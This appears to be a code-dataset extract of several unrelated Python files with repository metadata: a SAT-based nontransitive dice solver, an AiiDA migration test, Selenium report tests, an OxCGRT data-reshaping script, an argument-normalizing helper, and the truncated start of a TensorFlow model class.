Dataset schema (one record per source file; "nullable" marks columns flagged ⌀ in the original header):

| Column | Type | Range / notes |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 5 – 2.06M |
| ext | string | 10 classes |
| lang | string | 1 class (Python) |
| max_stars_repo_path | string | length 3 – 248 |
| max_stars_repo_name | string | length 5 – 125 |
| max_stars_repo_head_hexsha | string | length 40 – 78 |
| max_stars_repo_licenses | list | length 1 – 10 |
| max_stars_count | int64 | 1 – 191k, nullable |
| max_stars_repo_stars_event_min_datetime | string | length 24, nullable |
| max_stars_repo_stars_event_max_datetime | string | length 24, nullable |
| max_issues_repo_path | string | length 3 – 248 |
| max_issues_repo_name | string | length 5 – 125 |
| max_issues_repo_head_hexsha | string | length 40 – 78 |
| max_issues_repo_licenses | list | length 1 – 10 |
| max_issues_count | int64 | 1 – 67k, nullable |
| max_issues_repo_issues_event_min_datetime | string | length 24, nullable |
| max_issues_repo_issues_event_max_datetime | string | length 24, nullable |
| max_forks_repo_path | string | length 3 – 248 |
| max_forks_repo_name | string | length 5 – 125 |
| max_forks_repo_head_hexsha | string | length 40 – 78 |
| max_forks_repo_licenses | list | length 1 – 10 |
| max_forks_count | int64 | 1 – 105k, nullable |
| max_forks_repo_forks_event_min_datetime | string | length 24, nullable |
| max_forks_repo_forks_event_max_datetime | string | length 24, nullable |
| content | string | length 5 – 2.06M |
| avg_line_length | float64 | 1 – 1.02M |
| max_line_length | int64 | 3 – 1.03M |
| alphanum_fraction | float64 | 0 – 1 |
| count_classes | int64 | 0 – 1.6M |
| score_classes | float64 | 0 – 1 |
| count_generators | int64 | 0 – 651k |
| score_generators | float64 | 0 – 1 |
| count_decorators | int64 | 0 – 990k |
| score_decorators | float64 | 0 – 1 |
| count_async_functions | int64 | 0 – 235k |
| score_async_functions | float64 | 0 – 1 |
| count_documentation | int64 | 0 – 1.04M |
| score_documentation | float64 | 0 – 1 |
7720601585c87e81f391830224a24710fc679947
| 11,203
|
py
|
Python
|
utils.py
|
michaelpatrickpurcell/balanced-nontransitive-dice
|
d4d6e4cfc282d65edd10e9ff0219615c5ac2b77b
|
[
"MIT"
] | null | null | null |
utils.py
|
michaelpatrickpurcell/balanced-nontransitive-dice
|
d4d6e4cfc282d65edd10e9ff0219615c5ac2b77b
|
[
"MIT"
] | null | null | null |
utils.py
|
michaelpatrickpurcell/balanced-nontransitive-dice
|
d4d6e4cfc282d65edd10e9ff0219615c5ac2b77b
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy.special import factorial
from itertools import permutations, product
from pysat.solvers import Minisat22, Minicard
from pysat.pb import PBEnc
from clauses import build_clauses, build_max_min_clauses
from clauses import build_permutation_clauses
from clauses import build_cardinality_lits, build_exclusivity_lits
def compare_dice(first, second):
hits = 0
for x in first:
for y in second:
if y < x:
hits += 1
return hits
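# Illustrative example (not from the original file):
# compare_dice([3, 3, 3], [2, 2, 5]) == 6, since each of the three 3s beats the two 2s.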
def compare_doubled_dice(first, second, comp="max"):
d = len(first)
hits = 0
if comp == "max":
indices = range(1, 2 * d, 2)
if comp == "min":
indices = range(2 * d - 1, 0, -2)
for i, x in zip(indices, first):
for j, y in zip(indices, second):
if y < x:
hits += i * j
return hits
def recover_values(d, dice_names, constraints):
natural_faces = []
for die in dice_names:
faces = np.arange(d)
for die2 in dice_names:
if die != die2:
faces += constraints[(die, die2)].sum(1)
natural_faces.append(faces)
return natural_faces
def compress_values(*args):
T = {}
for i, die in enumerate(args):
T.update({k: i for k in die})
n = len(T.keys())
T_list = [T[i] for i in range(n)]
current_value = 0
current_die = T_list[0]
compressed_dice = [[] for _ in args]
compressed_dice[current_die].append(current_value)
for i in range(1, n):
previous_die = current_die
current_die = T_list[i]
if current_die != previous_die:
current_value += 1
compressed_dice[current_die].append(current_value)
return compressed_dice
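# Illustrative example (not from the original file):
#   compress_values([0, 3], [1, 2]) == [[0, 2], [1, 1]]
# Consecutive runs of face values owned by the same die collapse onto one compressed value.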
def sat_to_constraints(d, dice_names, sat_solution, compress=True):
dice_pairs = list(permutations(dice_names, 2))
n = len(dice_pairs)
signs_array = (sat_solution[: (n * d ** 2)] > 0).reshape((n, d, d))
constraints = {v: s for v, s in zip(dice_pairs, signs_array)}
return constraints
def sat_to_dice(d, dice_names, sat_solution, compress=False):
constraints = sat_to_constraints(d, dice_names, sat_solution)
natural_faces = recover_values(d, dice_names, constraints)
if compress:
dice_faces = compress_values(*natural_faces)
dice_dict = {k: v for k, v in zip(dice_names, dice_faces)}
else:
dice_dict = {k: v for k, v in zip(dice_names, natural_faces)}
return dice_dict
def dice_to_constraints(dice, dtype=int):  # np.int was removed from recent NumPy; the builtin int preserves the original behaviour
dice_names = list(dice.keys())
d = len(dice[dice_names[0]])
dice_pairs = list(permutations(dice_names, 2))
n = len(dice_pairs)
constraints = dict()
for x, y in dice_pairs:
foo = np.array(dice[x]).reshape(len(dice[x]), 1)
bar = np.array(dice[y]).reshape(1, len(dice[y]))
constraint = foo > bar
constraints[(x, y)] = constraint.astype(dtype)
return constraints
def dice_to_word(dice_solution):
dice_names = list(dice_solution.keys())
m = len(dice_names)
d = len(dice_solution[dice_names[0]])
foo = [[(x, dice_solution[x][i]) for i in range(d)] for x in dice_names]
bar = sum(foo, [])
ram = sorted(bar, key=lambda x: x[1])
word = "".join([t[0] for t in ram])
segments = [word[i : (i + m)] for i in range(0, m * d, m)]
segmented_word = " ".join(segments)
return word, segmented_word
def word_to_dice(word):
dice_names = set(word)
dice_solution = dict()
for i, w in enumerate(word):
if w in dice_solution:
dice_solution[w].append(i)
else:
dice_solution[w] = [i]
return dice_solution
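# Illustrative example (not from the original file) of the round trip between the two representations:
#   dice_to_word({"A": [0, 3], "B": [1, 2]}) == ("ABBA", "AB BA")
#   word_to_dice("ABBA") == {"A": [0, 3], "B": [1, 2]}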
def permute_letters(string, permutation, relative=True):
letter_set = set(string)
if relative:
pairs = [(string.index(letter), letter) for letter in letter_set]
sorted_pairs = sorted(pairs)
letters = "".join(l for i, l in sorted_pairs)
# letters = string[: len(letter_set)]
else:
letters = sorted(list(set(string)))
subs = {s: letters[p] for s, p in zip(letters, permutation)}
subs_string = "".join([subs[s] for s in string])
return subs_string
# ----------------------------------------------------------------------------
def verify_solution(scores, dice_solution):
for x, y in scores:
check = compare_dice(dice_solution[x], dice_solution[y])
print((x, y), check, scores[(x, y)])
def verify_doubling_solution(
scores, doubled_scores_max, doubled_scores_min, dice_solution
):
verify_solution(scores, dice_solution)
print()
for x, y in doubled_scores_max:
check = compare_doubled_dice(dice_solution[x], dice_solution[y], "max")
print((x, y), check, doubled_scores_max[(x, y)])
print()
for x, y in doubled_scores_min:
check = compare_doubled_dice(dice_solution[x], dice_solution[y], "min")
print((x, y), check, doubled_scores_min[(x, y)])
def verify_go_first(dice_solution, verbose=True):
m = len(dice_solution)
keys = np.array(sorted(list(dice_solution.keys())))
d = len(dice_solution[keys[0]])
check = d ** m // factorial(m, exact=True)
counts = {x: 0 for x in permutations(keys)}
for outcome in product(*[dice_solution[k] for k in keys]):
perm = np.argsort(outcome)
counts[tuple(keys[perm])] += 1
if verbose:
for k in counts:
print(k, check, counts[k])
print()
return counts
# ============================================================================
def build_sat(
d,
dice_names,
scores,
cardinality_clauses=False,
symmetry_clauses=True,
structure_clauses=True,
pb=PBEnc.equals,
):
clauses, cardinality_lits = build_clauses(
d,
dice_names,
scores,
card_clauses=cardinality_clauses,
symmetry_clauses=symmetry_clauses,
structure_clauses=structure_clauses,
)
sat = Minicard()
for clause in clauses:
sat.add_clause(clause)
if not cardinality_clauses:
for x, lits in cardinality_lits.items():
if pb in (PBEnc.equals, PBEnc.atmost):
sat.add_atmost(lits, scores[x])
if pb in (PBEnc.equals, PBEnc.atleast):
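                # "at least scores[x] of lits" is encoded as "at most d**2 - scores[x] of the negated lits"
                # (each ordered dice pair contributes d**2 literals in total).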
conv_lits = [-l for l in lits]
sat.add_atmost(conv_lits, d ** 2 - scores[x])
return sat
def sat_search(
d,
dice_names,
scores,
cardinality_clauses=False,
symmetry_clauses=True,
structure_clauses=True,
pb=PBEnc.equals,
solution_type="dice_solution",
):
sat = build_sat(
d=d,
dice_names=dice_names,
scores=scores,
cardinality_clauses=cardinality_clauses,
symmetry_clauses=symmetry_clauses,
structure_clauses=structure_clauses,
pb=pb,
)
is_solvable = sat.solve()
if is_solvable:
sat_solution = np.array(sat.get_model())
dice_solution = sat_to_dice(d, dice_names, sat_solution, compress=False)
else:
sat_solution = None
dice_solution = None
if solution_type == "sat_solution":
return sat_solution
elif solution_type == "dice_solution":
return dice_solution
# ----------------------------------------------------------------------------
def sat_exhaust(
d,
dice_names,
scores,
cardinality_clauses=False,
symmetry_clauses=True,
structure_clauses=True,
pb=PBEnc.equals,
solution_type="sat_solution",
):
sat = build_sat(
d=d,
dice_names=dice_names,
scores=scores,
cardinality_clauses=cardinality_clauses,
symmetry_clauses=symmetry_clauses,
structure_clauses=structure_clauses,
pb=pb,
)
dice_pairs = list(permutations(dice_names, 2))
n = len(dice_pairs)
solutions = sat.enum_models()
if solution_type == "sat_solution":
return [np.array(s) for s in solutions]
elif solution_type == "dice_solution":
dice_solutions = [sat_to_dice(d, dice_names, np.array(s)) for s in solutions]
return dice_solutions
# ----------------------------------------------------------------------------
def sat_search_max_min(d, dice_names, scores, max_scores, min_scores):
clauses = build_max_min_clauses(d, dice_names, scores, max_scores, min_scores)
sat = Minisat22()
for clause in clauses:
sat.add_clause(clause)
is_solvable = sat.solve()
if is_solvable:
        sat_solution = np.array(sat.get_model())
dice_solution = sat_to_dice(d, dice_names, sat_solution, compress=False)
else:
dice_solution = None
return dice_solution
# ----------------------------------------------------------------------------
def sat_search_go_first(d, dice_names, scores_2, scores_m, m=None):
    if m is None:
m = len(dice_names)
start_enum = 1
dice_pairs = list(permutations(dice_names, 2))
faces = {x: ["%s%i" % (x, i) for i in range(1, d + 1)] for x in dice_names}
# ------------------------------------------------------------------------
var_lists_2 = {(x, y): list(product(faces[x], faces[y])) for (x, y) in dice_pairs}
variables_2 = sum(var_lists_2.values(), [])
var_dict_2 = dict((v, k) for k, v in enumerate(variables_2, start_enum))
start_enum += len(variables_2)
# ------------------------------------------------------------------------
dice_perms = list(permutations(dice_names, m))
var_lists_m = {xs: list(product(*[faces[x] for x in xs])) for xs in dice_perms}
variables_m = sum(var_lists_m.values(), [])
var_dict_m = dict((v, k) for k, v in enumerate(variables_m, start_enum))
start_enum += len(variables_m)
# ------------------------------------------------------------------------
clauses_2, cardinality_lits_2 = build_clauses(d, dice_names, scores_2)
# ------------------------------------------------------------------------
clauses_m = build_permutation_clauses(d, var_dict_2, var_dict_m, dice_names, m)
cardinality_lits_m = build_cardinality_lits(d, var_dict_m, var_lists_m)
exclusivity_lits = build_exclusivity_lits(d, var_dict_m, dice_names, m)
# ------------------------------------------------------------------------
clauses = clauses_2 + clauses_m
sat = Minicard()
for clause in clauses:
sat.add_clause(clause)
for x, lits in cardinality_lits_2.items():
sat.add_atmost(lits, scores_2[x])
conv_lits = [-l for l in lits]
sat.add_atmost(conv_lits, d ** 2 - scores_2[x])
for x, lits in cardinality_lits_m.items():
sat.add_atmost(lits, scores_m[x])
conv_lits = [-l for l in lits]
sat.add_atmost(conv_lits, d ** m - scores_m[x])
for x, lits in exclusivity_lits.items():
sat.add_atmost(lits, 1)
conv_lits = [-l for l in lits]
sat.add_atmost(conv_lits, len(lits) - 1)
is_solvable = sat.solve()
if is_solvable:
sat_solution = np.array(sat.get_model())
dice_solution = sat_to_dice(d, dice_names, sat_solution, compress=False)
else:
dice_solution = None
return dice_solution
| 29.954545
| 86
| 0.595376
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 924
| 0.082478
|
7722bc9189fc79c029275036a7e49a54482e4d8c
| 38
|
py
|
Python
|
pkg/agents/team4/trainingAgent/findBestConfigs.py
|
SOMAS2021/SOMAS2021
|
acaa13e3d663d3f59589f3b26860db643b3bf29e
|
[
"MIT"
] | 13
|
2021-12-02T09:28:47.000Z
|
2022-01-14T18:39:51.000Z
|
pkg/agents/team4/trainingAgent/findBestConfigs.py
|
SOMAS2021/SOMAS2021
|
acaa13e3d663d3f59589f3b26860db643b3bf29e
|
[
"MIT"
] | 190
|
2021-11-19T15:37:44.000Z
|
2022-01-17T00:23:13.000Z
|
pkg/agents/team4/trainingAgent/findBestConfigs.py
|
SOMAS2021/SOMAS2021
|
acaa13e3d663d3f59589f3b26860db643b3bf29e
|
[
"MIT"
] | 4
|
2021-11-22T18:21:53.000Z
|
2021-12-22T13:55:42.000Z
|
# TODO: automate finding best agents
| 19
| 37
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 37
| 0.973684
|
772382a62fd85bce40038234f29c973df9cee412
| 2,653
|
py
|
Python
|
tests/storage/psql_dos/migrations/django_branch/test_0043_default_link_label.py
|
mkrack/aiida-core
|
bab1ad6cfc8e4ff041bce268f9270c613663cb35
|
[
"MIT",
"BSD-3-Clause"
] | 153
|
2016-12-23T20:59:03.000Z
|
2019-07-02T06:47:52.000Z
|
tests/storage/psql_dos/migrations/django_branch/test_0043_default_link_label.py
|
mkrack/aiida-core
|
bab1ad6cfc8e4ff041bce268f9270c613663cb35
|
[
"MIT",
"BSD-3-Clause"
] | 2,466
|
2016-12-24T01:03:52.000Z
|
2019-07-04T13:41:08.000Z
|
tests/storage/psql_dos/migrations/django_branch/test_0043_default_link_label.py
|
mkrack/aiida-core
|
bab1ad6cfc8e4ff041bce268f9270c613663cb35
|
[
"MIT",
"BSD-3-Clause"
] | 88
|
2016-12-23T16:28:00.000Z
|
2019-07-01T15:55:20.000Z
|
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Test update of link labels."""
from uuid import uuid4
from aiida.common import timezone
from aiida.storage.psql_dos.migrator import PsqlDostoreMigrator
def test_legacy_jobcalc_attrs(perform_migrations: PsqlDostoreMigrator):
"""Test update of link labels."""
# starting revision
perform_migrations.migrate_up('django@django_0042')
# setup the database
user_model = perform_migrations.get_current_table('db_dbuser')
node_model = perform_migrations.get_current_table('db_dbnode')
link_model = perform_migrations.get_current_table('db_dblink')
with perform_migrations.session() as session:
user = user_model(
email='user@aiida.net',
first_name='John',
last_name='Doe',
institution='EPFL',
)
session.add(user)
session.commit()
node_process = node_model(
uuid=str(uuid4()),
node_type='process.calculation.calcjob.CalcJobNode.',
label='test',
description='',
user_id=user.id,
ctime=timezone.now(),
mtime=timezone.now(),
)
node_data = node_model(
uuid=str(uuid4()),
node_type='data.core.dict.Dict.',
label='test',
description='',
user_id=user.id,
ctime=timezone.now(),
mtime=timezone.now(),
)
session.add(node_process)
session.add(node_data)
session.commit()
link = link_model(
input_id=node_data.id,
output_id=node_process.id,
type='input',
label='_return',
)
session.add(link)
session.commit()
link_id = link.id
# final revision
perform_migrations.migrate_up('django@django_0043')
link_model = perform_migrations.get_current_table('db_dblink')
with perform_migrations.session() as session:
link = session.get(link_model, link_id)
assert link.label == 'result'
| 35.373333
| 75
| 0.551074
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 965
| 0.363739
|
7729ca0d13aba7858c6f6bf672c7c5cb27ab55a0
| 7,901
|
py
|
Python
|
tests/src/SI/MAP/School_Map_regression_testing.py
|
JalajaTR/cQube
|
6bf58ab25f0c36709630987ab730bbd5d9192c03
|
[
"MIT"
] | null | null | null |
tests/src/SI/MAP/School_Map_regression_testing.py
|
JalajaTR/cQube
|
6bf58ab25f0c36709630987ab730bbd5d9192c03
|
[
"MIT"
] | null | null | null |
tests/src/SI/MAP/School_Map_regression_testing.py
|
JalajaTR/cQube
|
6bf58ab25f0c36709630987ab730bbd5d9192c03
|
[
"MIT"
] | null | null | null |
import time
import unittest
from Data.parameters import Data
from SI.MAP.check_infrascore_with_download_functionality import SchoolInfra_scores
from SI.MAP.check_sc_map_clusterwise_records import test_school_map_schoollevel_records
from SI.MAP.click_on_anydistrict_and_download_csv import download_icon
from SI.MAP.click_on_block_cluster_school_and_check_schoolscount import Block_cluster_school_count
from SI.MAP.click_on_blocks import click_on_blocks
from SI.MAP.click_on_blocks_and_scores import block_btn_scores
from SI.MAP.click_on_clusters import cluster_button
from SI.MAP.click_on_clusters_and_scores import cluster_btn_scores
from SI.MAP.click_on_district_and_homeicon import district_home
from SI.MAP.click_on_hyperlink import click_on_hyperlink
from SI.MAP.click_on_infra_score import click_on_infrascores
from SI.MAP.click_on_schools import click_schoolbutton
from SI.MAP.click_on_schools_and_scores import schools_btn_scores
from reuse_func import GetData
class cQube_SI_Map_Report(unittest.TestCase):
@classmethod
def setUpClass(self):
self.data = GetData()
self.driver = self.data.get_driver()
self.data.open_cqube_appln(self.driver)
self.data.login_cqube(self.driver)
time.sleep(2)
self.data.navigate_to_school_infrastructure_map()
time.sleep(3)
def test_hyperlink(self):
b = click_on_hyperlink(self.driver)
res = b.test_link()
if "school-infra-map" in self.driver.current_url:
print("school infra map based report present")
else:
print("home icon is not working ")
def test_districtwise_download(self):
b = download_icon(self.driver)
res = b.test_donwload()
self.assertEqual(0,res,msg="mismatch found at no of school values")
self.data.page_loading(self.driver)
def test_schools_per_cluster_csv_download1(self):
school = test_school_map_schoollevel_records(self.driver)
result = school.check_download_csv1()
if result == 0:
print("Schools per cluster csv download report is working")
print("on selection of each district,block and cluster")
print("The footer value of no of schools and no of students are")
print("equals to downloaded file")
else:
            raise self.failureException("Schools per cluster csv report download1 is not working")
def test_click_home_in_districtwise(self):
b = district_home(self.driver)
res = b.test_district()
if "school-infra-map" in self.driver.current_url:
print("school infra map based report present")
else:
print("home icon is not working ")
def test_logout(self):
self.driver.find_element_by_xpath(Data.hyper_link).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id(Data.logout).click()
self.data.page_loading(self.driver)
count = 0
print(self.driver.title)
if 'Log in to cQube' in self.driver.title:
print('logout button is working and Login page is displayed')
else:
print("logout button is not working ")
count = count + 1
self.assertEqual(0,count,msg='logout button is not worked')
self.data.login_cqube(self.driver)
self.data.page_loading(self.driver)
self.data.navigate_to_school_infrastructure_map()
self.data.page_loading(self.driver)
def test_infrascore(self):
b = SchoolInfra_scores(self.driver)
infra_score = b.infra_score()
b.remove_csv()
self.assertNotEqual(0, infra_score, msg='Failed')
boy_toilet = b.Boys_toilet_percentage()
b.remove_csv()
self.assertNotEqual(0, boy_toilet, msg='Failed')
drinking_water = b.drinking_water()
b.remove_csv()
self.assertNotEqual(0, drinking_water, msg='Failed')
Electricity = b.Electricity()
b.remove_csv()
self.assertNotEqual(0, Electricity, msg='Failed')
girl_toilet = b.girls_toilet()
b.remove_csv()
self.assertNotEqual(0, girl_toilet, msg='Failed')
Handpump = b.Handpump()
b.remove_csv()
self.assertNotEqual(0, Handpump, msg='Failed')
Handwash = b.Handwash()
b.remove_csv()
self.assertNotEqual(0, Handwash, msg='Failed')
Library = b.Library()
b.remove_csv()
self.assertNotEqual(0, Library, msg='Failed')
Solar_panel = b.Solar_panel()
b.remove_csv()
self.assertNotEqual(0, Solar_panel, msg='Failed')
Tapwater = b.Tapwater()
b.remove_csv()
self.assertNotEqual(0, Tapwater, msg='Failed')
Toilet = b.Toilet()
b.remove_csv()
self.assertNotEqual(0, Toilet, msg='Failed')
def test_infrascores(self):
b = click_on_infrascores(self.driver)
res = b.test_infrascores()
self.assertNotEqual(0, res, msg="infra score options not contains in drop down")
print("checked with infrascores options")
def test_click_on_block_cluster_school(self):
b = click_on_blocks(self.driver)
res1,res2 = b.test_blocks_button()
self.assertNotEqual(0, res1, msg="Records are not present on map ")
self.assertTrue(res2,msg='Block wise file downloading is not working ')
print("Block buttons is working...")
b = cluster_button(self.driver)
res1, res2 = b.test_clusterbtn()
self.assertNotEqual(0, res1, msg="Records are not present on map ")
self.assertTrue(res2, msg='Cluster wise file downloading is not working ')
print("cluster button is working ")
b = click_schoolbutton(self.driver)
res1,res2 = b.test_click_on_school_btn()
self.assertNotEqual(0, res1, msg="Records are not present on map ")
self.assertTrue(res2, msg='School wise file downloading is not working ')
print("school button is working ")
def test_no_of_schools(self):
b = Block_cluster_school_count(self.driver)
r, r1, r2, r3 = b.test_check_total_schoolvalue()
        self.assertEqual(int(r), int(r1), msg="mismatch found in no of schools at block level")
        self.assertEqual(int(r), int(r2), msg="mismatch found in no of schools at cluster level")
        self.assertEqual(int(r), int(r3), msg="mismatch found in no of schools at school level")
        self.data.page_loading(self.driver)
        print("checked and compared with footer values")
def test_block_cluster_schools_infrascores(self):
b = block_btn_scores(self.driver)
result = b.test_click_blocks()
self.data.page_loading(self.driver)
print("block button is worked and infra scores is working ")
b = cluster_btn_scores(self.driver)
result = b.test_click_clusters()
self.data.page_loading(self.driver)
print("cluster button is worked and infra scores is working ")
b = schools_btn_scores(self.driver)
res = b.test_click_schools()
self.data.page_loading(self.driver)
print("school button is worked and infra scores is working ")
def test_homebtn(self):
self.driver.find_element_by_xpath(Data.hyper_link).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id('homeBtn').click()
self.data.page_loading(self.driver)
count = 0
if 'dashboard' in self.driver.current_url:
print("cQube Landing page is displayed ")
else:
print('Homebutton is not working ')
count = count + 1
self.assertEqual(0,count,msg='Landing page does not exists')
self.data.navigate_to_school_infrastructure_map()
self.data.page_loading(self.driver)
@classmethod
def tearDownClass(cls):
cls.driver.close()
| 38.541463
| 98
| 0.678142
| 6,925
| 0.876471
| 0
| 0
| 373
| 0.047209
| 0
| 0
| 1,532
| 0.1939
|
772a4eead684d14c1321c64fcce204b67581646f
| 4,217
|
py
|
Python
|
src/manual/melt_oxcgrt2.py
|
lshtm-gis/WHO_PHSM_Cleaning
|
5892673922fc555fb86d6e0be548b48c7dc66814
|
[
"MIT"
] | null | null | null |
src/manual/melt_oxcgrt2.py
|
lshtm-gis/WHO_PHSM_Cleaning
|
5892673922fc555fb86d6e0be548b48c7dc66814
|
[
"MIT"
] | 123
|
2020-10-12T11:06:27.000Z
|
2021-04-28T15:32:29.000Z
|
src/manual/melt_oxcgrt2.py
|
lshtm-gis/WHO_PHSM_Cleaning
|
5892673922fc555fb86d6e0be548b48c7dc66814
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 3 15:24:46 2020
@author: hamishgibbs
"""
import pandas as pd
import re
import numpy as np
#%%
ox = pd.read_csv('https://raw.githubusercontent.com/OxCGRT/covid-policy-tracker/master/data/OxCGRT_latest_withnotes.csv')
#%%
ox = ox[0:100]
#%%
ox.fillna(0.0, inplace = True)
#%%
def oxcgrt_records(ox, drop_columns = []):
'''
Function to convert OXCGRT data to records
This is an additional challenge because of the wide format of the Oxford data
'''
full_value_names, value_names, stub_names = get_names(ox)
id_columns = [x for x in list(set(ox.columns).difference(set(full_value_names))) if x not in drop_columns]
records = ox.to_dict(orient="records")
rs = [x for x in [get_measure_records(r, stub_names, id_columns) for r in records] if x != []]
rs = [item for sublist in rs for item in sublist]
return(rs)
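# Illustrative sketch of the reshaping (not from the original file): a single wide row such as
#   {"CountryName": "Aruba", "C1_School closing": 2.0, "C1_Flag": 1.0, "C1_Notes": "free text"}
# becomes one record per measure stub, e.g.
#   {"CountryName": "Aruba", "measure_name": "C1_School closing", "measure": 2.0, "flag": 1.0, "notes": "free text"}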
def get_names(ox):
'''
Function to get names of columns holding measure information.
These columns begin with the prefix "A1_" etc.
returns:
full_value_names: the names of all columns with measure information
value_names: the names of measure columns
stub_names: the measure column prefixes (i.e. "A1")
'''
stub_exp = r'[A-Z][0-9]+_'
full_value_names = [match for match in ox.columns if re.findall(stub_exp , match) != []]
value_names = [x for x in full_value_names if 'Flag' not in x]
value_names = [x for x in value_names if 'Notes' not in x]
stub_names = [x.split('_')[0] for x in value_names]
return(full_value_names, value_names, stub_names)
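# Illustrative sketch (not from the original file): for columns
#   ["CountryName", "C1_School closing", "C1_Flag", "C1_Notes"]
# get_names would return
#   full_value_names = ["C1_School closing", "C1_Flag", "C1_Notes"]
#   value_names      = ["C1_School closing"]
#   stub_names       = ["C1"]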
def get_measure_records(combined_record, stub_names, id_columns):
'''Function to break rows into individual records by stub group
i.e. subset a row for only C4 records and other information, repeat for all possible measures.
Also drops records with no data where sum(all values) == 0
'''
records = []
for stub in stub_names:
        stub_keys = [x for x in combined_record if x.startswith(stub + "_")]  # the original referenced full_value_names, which is not defined in this scope
keys = id_columns + stub_keys
try:
flag_key = [x for x in stub_keys if '_Flag' in x][0]
except:
pass
try:
notes_key = [x for x in stub_keys if '_Notes' in x][0]
except:
pass
subset = {key: value for key, value in combined_record.items() if key in keys}
try:
if sum([subset[key] for key in stub_keys]) == 0:
continue
except:
pass
try:
subset['flag'] = subset.pop(flag_key)
except:
subset['flag'] = 0.0
pass
try:
subset['notes'] = subset.pop(notes_key)
except:
pass
measure_key = list(set(list(subset.keys())).difference(set(id_columns + ['measure_name', 'flag', 'notes'])))
subset['measure'] = subset.pop(measure_key[0])
subset['measure_name'] = measure_key[0]
records.append(subset)
return(records)
#%%
drop_columns = ['ConfirmedCases',
'ConfirmedDeaths', 'StringencyIndex', 'StringencyIndexForDisplay',
'StringencyLegacyIndex', 'StringencyLegacyIndexForDisplay',
'GovernmentResponseIndex', 'GovernmentResponseIndexForDisplay',
'ContainmentHealthIndex', 'ContainmentHealthIndexForDisplay',
'EconomicSupportIndex', 'EconomicSupportIndexForDisplay']
#%%
ox_r = oxcgrt_records(ox, drop_columns)
#%%
len(ox_r)
#%%
keep_columns = list(set(ox.columns).difference(set(drop_columns)))
full_value_names, value_names, stub_names = get_names(ox)
id_columns = [x for x in list(set(ox.columns).difference(set(full_value_names))) if x not in drop_columns]
#%%
records = ox.to_dict(orient="records")
#%%
rs = [x for x in [get_measure_records(r, stub_names, id_columns) for r in records] if x != []]
rs = [item for sublist in rs for item in sublist]
rs = pd.DataFrame(rs)
#%%
| 27.562092
| 121
| 0.609912
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,438
| 0.341001
|
772a5de76c01fda9fdad90cbd5de3085dda181b3
| 2,082
|
py
|
Python
|
src/wildfires/cache/same_call.py
|
akuhnregnier/wildfires
|
4d31cbdd4a1303ecebc391a35c73b8f07d8fe400
|
[
"MIT"
] | 1
|
2021-01-30T15:38:32.000Z
|
2021-01-30T15:38:32.000Z
|
src/wildfires/cache/same_call.py
|
akuhnregnier/wildfires
|
4d31cbdd4a1303ecebc391a35c73b8f07d8fe400
|
[
"MIT"
] | null | null | null |
src/wildfires/cache/same_call.py
|
akuhnregnier/wildfires
|
4d31cbdd4a1303ecebc391a35c73b8f07d8fe400
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Decorator guaranteeing uniform function calls."""
from inspect import Parameter, signature
def extract_uniform_args_kwargs(f, *args, ignore=None, **kwargs):
"""Extract uniform arguments given a function and the parameters it is called with.
Args:
f (callable): Function being called.
*args, **kwargs: Function arguments.
        ignore (None or iterable of str): Arguments to ignore. Their corresponding
values will never be returned.
Returns:
args, kwargs: Standardised representation of the given arguments.
"""
if ignore is None:
ignore = set()
sig = signature(f)
name_kind = {p.name: p.kind for p in sig.parameters.values()}
bound_args = sig.bind(*args, **kwargs)
bound_args.apply_defaults()
# Possible argument types:
#
# KEYWORD_ONLY
# POSITIONAL_ONLY
# POSITIONAL_OR_KEYWORD
# VAR_KEYWORD
# VAR_POSITIONAL
#
# Accumulate POSITIONAL_ONLY, POSITIONAL_OR_KEYWORD, and VAR_POSITIONAL in the
# order given in `arguments`.
new_args = []
pos_kind = (
Parameter.POSITIONAL_ONLY,
Parameter.POSITIONAL_OR_KEYWORD,
Parameter.VAR_POSITIONAL,
)
for name, value in bound_args.arguments.items():
if name in ignore:
continue
if name_kind[name] not in pos_kind:
break
if name_kind[name] == Parameter.VAR_POSITIONAL:
new_args.extend(value)
else:
new_args.append(value)
# Accumulate KEYWORD_ONLY and VAR_KEYWORD in the
# order given in `arguments`.
new_kwargs = {}
kw_kind = (Parameter.KEYWORD_ONLY, Parameter.VAR_KEYWORD)
for name, value in bound_args.arguments.items():
if name in ignore:
continue
if name_kind[name] in pos_kind:
continue
assert name_kind[name] in kw_kind
if name_kind[name] == Parameter.VAR_KEYWORD:
new_kwargs.update(value)
else:
new_kwargs[name] = value
return new_args, new_kwargs
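# Illustrative usage (a sketch, not part of the original module):
#   def f(a, b=2, *args, c=3, **kwargs): ...
#   extract_uniform_args_kwargs(f, 1, c=4, d=5)  ->  ([1, 2], {'c': 4, 'd': 5})
# so equivalent calls written with different argument styles normalize to the same representation.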
| 29.742857
| 87
| 0.64121
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 778
| 0.373679
|
772a5f878a0f88d452d599cf44b77a39b7955775
| 2,862
|
py
|
Python
|
models/mnist_model.py
|
dcurry09/Tensorflow-Project-OOP
|
7b142046cf6d736790029092dc83c0ce0009586b
|
[
"Apache-2.0"
] | null | null | null |
models/mnist_model.py
|
dcurry09/Tensorflow-Project-OOP
|
7b142046cf6d736790029092dc83c0ce0009586b
|
[
"Apache-2.0"
] | null | null | null |
models/mnist_model.py
|
dcurry09/Tensorflow-Project-OOP
|
7b142046cf6d736790029092dc83c0ce0009586b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
"""
Implements a TF Model class by inheriting the Model base class.
@author: David Curry
@version: 1.0
"""
from base.base_model import BaseModel
import tensorflow as tf
class MnistModel(BaseModel):
def __init__(self, config):
"""
Constructor to initialize the TF model class by inheritance from super.
:param config
:return none
:raises none
"""
